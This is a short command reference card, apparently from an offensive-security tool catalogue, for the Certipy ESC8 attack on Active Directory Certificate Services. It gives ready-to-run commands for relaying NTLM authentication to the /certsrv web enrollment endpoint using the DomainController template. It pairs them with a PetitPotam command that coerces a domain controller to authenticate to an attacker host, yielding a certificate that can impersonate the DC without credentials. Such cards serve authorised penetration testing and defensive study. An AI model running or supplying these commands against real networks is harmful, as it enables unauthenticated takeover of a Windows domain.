Certipy ESC8 (HTTP Web Enrollment Relay)

ESC8: AD CS Web Enrollment endpoint accepts NTLM and is missing EPA. Relay coerced machine authentication (PetitPotam, DFSCoerce, PrinterBug) to /certsrv to enroll a cert as the victim — typically a DC machine account, yielding a TGT-capable certificate.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
no credentials
Protocols
HTTP, NTLM

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy relay -target 'http://<ca-fqdn>' -template '<template>'

Credential variants

The same attack using a different authentication material.

Default DomainController template requires no credentials

certipy relay -target 'http://<ca-fqdn>' -template DomainController

Examples

certipy relay -target 'http://ca.corp.local' -template DomainController
# In another terminal: coerce auth from DC to your relay host
python3 PetitPotam.py <attacker-ip> <dc-ip>

Tags

certipy adcs esc8 relay ntlm-relay web-enrollment

References